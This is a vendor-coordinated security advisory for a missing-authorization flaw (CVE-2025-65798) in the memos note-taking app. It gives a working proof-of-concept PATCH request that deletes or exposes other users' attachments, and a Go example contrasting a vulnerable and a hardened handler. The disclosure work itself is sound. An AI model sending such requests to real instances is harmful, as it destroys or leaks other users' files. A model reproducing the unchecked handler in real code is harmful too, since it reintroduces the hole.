usd-2025-59 | Broken Access Control in Memo Attachments
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: Medium
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65798
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65798
Advisory ID: usd-2025-59
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
When updating which attachments are assigned to a Memo, neither the creator of the Memo nor the creator of the attachment is validated. An authenticated, low-privileged attacker can use this vulnerability to delete arbitrary attachments or make private attachments public.
Proof of Concept
The following HTTP request can be used by low-privileged users with arbitrary Memo and attachment IDs. Note that only IDs of public Memos, and of attachments that are attached to public Memos, are discoverable.
PATCH /api/v1/memos/ff6FyXzix9d8QyUQGvig3Q/attachments HTTP/1.1
Host: memos:5230
Content-Type: application/json
Cookie: user_session=3-3a[... REDACTED ...]79
Content-Length: 133

{
  "name": "memos/ff6FyXzix9d8QyUQGvig3Q",
  "attachments": [
    { "name": "attachments/QLjAxtsxnHTigoQYsaixSv" }
  ]
}
If the attachments list is empty, arbitrary attachments can be removed. Note that these are also deleted from disk when they are unassigned from a Memo.
In a different scenario, if an attacker discovers an inaccessible attachment ID, they can assign the Attachment to a public Memo, making the previously inaccessible Attachment public.
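The two missing checks, shown as an added Go example that is not the memos project's code and not the fix from the pull request: the Memo and Attachment records, the CreatorID ownership model and the in-memory store are assumptions made for the example. The vulnerable helper applies the list unconditionally; the hardened one requires the caller to own both the Memo and every attachment assigned to it, which covers both the clear-all and the reassign-to-public scenario.

```go
package main

import (
	"errors"
	"fmt"
)

// Hypothetical records standing in for memos and attachments;
// not the memos project's own types.
type Memo struct {
	Name      string
	CreatorID int32
}

type Attachment struct {
	Name      string
	CreatorID int32
}

var ErrPermissionDenied = errors.New("permission denied")

// vulnerableSetMemoAttachments applies the new list without checking
// who created the memo or the attachments: the flaw in the advisory.
func vulnerableSetMemoAttachments(actorID int32, memo Memo, attachments []Attachment, store map[string][]Attachment) error {
	store[memo.Name] = attachments // any authenticated user reaches here
	return nil
}

// hardenedSetMemoAttachments adds the two missing checks: the caller
// must be the memo's creator and the creator of every attachment
// being assigned (ownership model assumed for this example).
func hardenedSetMemoAttachments(actorID int32, memo Memo, attachments []Attachment, store map[string][]Attachment) error {
	if memo.CreatorID != actorID {
		return fmt.Errorf("%w: memo %q belongs to another user", ErrPermissionDenied, memo.Name)
	}
	for _, a := range attachments {
		if a.CreatorID != actorID {
			return fmt.Errorf("%w: attachment %q belongs to another user", ErrPermissionDenied, a.Name)
		}
	}
	store[memo.Name] = attachments
	return nil
}

func main() {
	// Constructed sample: user 1 owns a memo with one private attachment; user 2 tries to clear it.
	store := map[string][]Attachment{"memos/victim": {{Name: "attachments/private", CreatorID: 1}}}
	err := hardenedSetMemoAttachments(2, Memo{Name: "memos/victim", CreatorID: 1}, nil, store)
	fmt.Println(err, "| attachments still present:", len(store["memos/victim"]))
}
```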
Fix
Fixes for all mentioned vulnerabilities have been submitted as a pull request.
References
Timeline
- 2025-11-03: First contact request
- 2025-11-04: Pull request submitted
- 2025-11-06: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.